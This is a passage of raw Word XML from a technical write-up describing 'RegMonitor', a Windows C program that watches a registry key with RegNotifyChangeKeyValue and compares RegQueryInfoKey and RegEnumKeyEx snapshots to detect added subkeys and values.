          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>achSubKey: a string storing the subkey. This subkey belongs to the root key above.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00152570" w:rsidRDefault="004A69C8" w:rsidP="00152570">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>hKey: a handle that stores the returned registry key handle for the opened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Open and read specified registry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 RegOpenKeyExA(hMainKey,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KEY_NOTIFY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KEY_READ</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KEY_QUERY_VALUE</w:t>
      </w:r>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&amp;hKey);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(lErrorCode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RegOpenKeyEx (%d).\n"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, lErrorCode);</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152570" w:rsidRDefault="00152570" w:rsidP="00152570">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45C09" w:rsidRDefault="00245C09" w:rsidP="00D17EE5">
      <w:r>
        <w:t>For identifying changes that happened to the registry, RegMonitor calls RegQuery twice. At the first call, RegQuery snapshots the specified registry key using the “hKey” handle and return the current number of the subkey and value belonging to that monitored key. Along to those numbers, RegQuery also return names of the last subkey and the last value in Registry subkey and value chains.</w:t>
      </w:r>
      <w:r w:rsidR="00D17EE5">
        <w:t xml:space="preserve"> We will discuss about RegQuery in the following section.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//Snapshot Registry Before Change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RegQuery(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//Handle to registry key which is being monitored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hKey,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subkey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&amp;nSubKeys,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value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//Indicate whether there is any change happened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FALSE</w:t>
      </w:r>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achSubKey,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subkey in subkey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lpLastSubkeyName,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value in value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F6B0B" w:rsidRDefault="00DF6B0B" w:rsidP="00D17EE5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>RegMonitor creates an event and calls a Windows API named “RegNotifyChange KeyValue”. RegNotifyChangeKeyValue takes 3 primary arguments:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF6B0B" w:rsidRDefault="00DF6B0B" w:rsidP="00DF6B0B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>hKey: The current monitored registry key handle</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF6B0B" w:rsidRDefault="00DF6B0B" w:rsidP="00DF6B0B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>dwFilter: The DWORD</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF6B0B">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>variable store information for which activity to be monitored.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B1D4D" w:rsidRDefault="005B1D4D" w:rsidP="005B1D4D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>hEvent: An Event Handle for RegNotifyChangeKeyValue to capture for registry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    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>// Create an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hEvent = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>CreateEvent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(</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FALSE</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(hEvent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CreateEvent (%d).\n"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, GetLastError());</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Watch the registry key for a change of value.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RegNotifyChangeKeyValue(hKey,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dwFilter,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hEvent,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(lErrorCode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RegNotifyChangeKeyValue (%d).\n"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, lErrorCode);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D72550" w:rsidRDefault="00D72550" w:rsidP="005B1D4D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>RegMonitor stands still and waits for registry event happen by using hEvent specified by RegNotifyChangeKeyValue.</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an event to occur.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"Waiting for a change in the specified key...\n"</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(WaitForSingleObject(hEvent,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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>WAIT_FAILED</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in WaitForSingleObject (%d).\n"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, GetLastError());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printf(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"\nChange has occurred.\n"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002565A7" w:rsidRDefault="002565A7"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D92F46" w:rsidRDefault="00541694" w:rsidP="00D92F46">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>When WaitForSingleObject return, if the return value is not WAIT_FAILED (which is set to 0xFFFFFFFF), there could have been an event happened in the registry database. RegMonitor calls RegQuery for capturing another snapshot, and comparing it with the previous one to identify change which takes place.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xml:space="preserve">//Snapshot Registry in case event occurs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RegQuery(hKey,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&amp;nSubKeys,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This value is now set to TRUE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Indicating there was change happened</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t xml:space="preserve">lpLastSubkeyName,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p>
    <w:p w:rsidR="00541694" w:rsidRDefault="00541694" w:rsidP="0054169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541694" w:rsidRDefault="00541694" w:rsidP="00541694">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000A77FD" w:rsidRDefault="000A77FD" w:rsidP="00541694">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000A77FD" w:rsidRDefault="000A77FD" w:rsidP="000A77FD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A77FD">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
        </w:rPr>
        <w:t>RegQuery</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA32A4" w:rsidRDefault="00BA32A4" w:rsidP="000A77FD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>RegQuery is a function for querying the information stored in a specified registry key.</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RegQuery(</w:t>
      </w:r>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bool</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">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achMainKey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achSubKey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lpLastSubkeyName</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lpLastValueName</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A77FD" w:rsidRDefault="00BA32A4" w:rsidP="00BA32A4">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 xml:space="preserve">{ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002565A7" w:rsidRDefault="002565A7" w:rsidP="00BA32A4">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BA32A4" w:rsidRDefault="00320ED1" w:rsidP="00BA32A4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Using a Windows API called “RegQueryInfoKey” for getting information from</w:t>
      </w:r>
      <w:r w:rsidR="00A3196D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> registry key.</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RegQueryInfoKey</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(</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key handle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achClass,                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">// buffer for class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&amp;cchClassName,           </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">// size of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reserved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&amp;cSubKeys,               </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">// number of subkeys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&amp;cbMaxSubKey,            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">// longest subkey size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&amp;cchMaxClass,            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">// longest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&amp;cValues,                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">// number of values for this key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&amp;cchMaxValue,            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">// longest value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&amp;cbMaxValueData,         </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">// longest value data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&amp;cbSecurityDescriptor,   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">// security descriptor </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00320ED1" w:rsidRDefault="00320ED1"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&amp;ftLastWriteTime);       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>// last write time</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002565A7" w:rsidRDefault="002565A7"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p>
    <w:p w:rsidR="00320ED1" w:rsidRDefault="00320ED1" w:rsidP="00320ED1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">That API returns </w:t>
      </w:r>
      <w:r w:rsidR="00A3196D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>2 valuable information</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00320ED1" w:rsidRDefault="00320ED1" w:rsidP="00320ED1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>cSubKeys: The number of current subkeys belong to that key</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00320ED1" w:rsidRDefault="00320ED1" w:rsidP="00320ED1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>cValues: The number of current values belong to that key</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE6875" w:rsidRDefault="00AE6875" w:rsidP="00AE6875">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>RegQuery identifying changing to the specified registry key by performing 2 step:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE6875" w:rsidRDefault="00AE6875" w:rsidP="00AE6875">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Step 1: Monitoring the Subkeys</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE6875" w:rsidRPr="00AE6875" w:rsidRDefault="00AE6875" w:rsidP="00AE6875">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Step 2: Monitoring the Values</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE6875" w:rsidRPr="00AE6875" w:rsidRDefault="00AE6875" w:rsidP="00AE6875">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>Monitoring the subkeys</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A3196D" w:rsidRDefault="00A3196D" w:rsidP="003F590C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>If the number of subkey is larger than 0, for each subkey, RegQuery returns specific information belong to that subkey, using a Windows API called “RegEnumKeyEx”. If the current queried subkey is the last subkey in chain</w:t>
      </w:r>
      <w:r w:rsidR="00AE6875">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> and the variable “aft” is set </w:t>
      </w:r>
      <w:r w:rsidR="00AE6875">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>to FALSE (indicates that there wasn’t any event happened in the current query process)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">, RegQuery copy </w:t>
      </w:r>
      <w:r w:rsidR="0055127B">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> name for returning later.</w:t>
      </w:r>
      <w:r w:rsidR="0055127B">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>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i&lt;cSubKeys;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cbName = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>MAX_KEY_LENGTH</w:t>
      </w:r>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RegEnumKeyEx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>hKey</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, i,</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achKey,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>// the current querying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&amp;cbName,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>// size of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&amp;ftLastWriteTime);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6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>TEXT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"(%d) %s\n"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>), i+1, achKey);</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wcscpy(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>lpLastSubkeyName</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, achKey);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F590C" w:rsidRDefault="003F590C" w:rsidP="003F590C">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DB2D4C" w:rsidRDefault="00DB2D4C" w:rsidP="00DB2D4C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>RegQuery defines a value called “retCode” which stores the return error code when calling RegEnumKeyEx. When the value returned is ERROR_SUCCESS indicating that the function is executed successfully, RegQuery does further steps.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055127B" w:rsidRDefault="0055127B" w:rsidP="0055127B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>When “aft” is FALSE, RegQuery also return the number of subkeys.</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 cSubKeys;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055127B" w:rsidRDefault="0055127B" w:rsidP="0055127B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>and the number of value.</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 cValues;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A3196D" w:rsidRDefault="00AE6875" w:rsidP="00A3196D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>When there is a registry event happened, RegQuery is called with “aft” set to TRUE. At that time, RegQuery defines a variable called “nCount”, which is the different between:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F05F19" w:rsidRDefault="00AE6875" w:rsidP="00F05F19">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">nSubkeys: The number of subkeys in the </w:t>
      </w:r>
      <w:r w:rsidR="00F05F19">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>previous</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> snapshot</w:t>
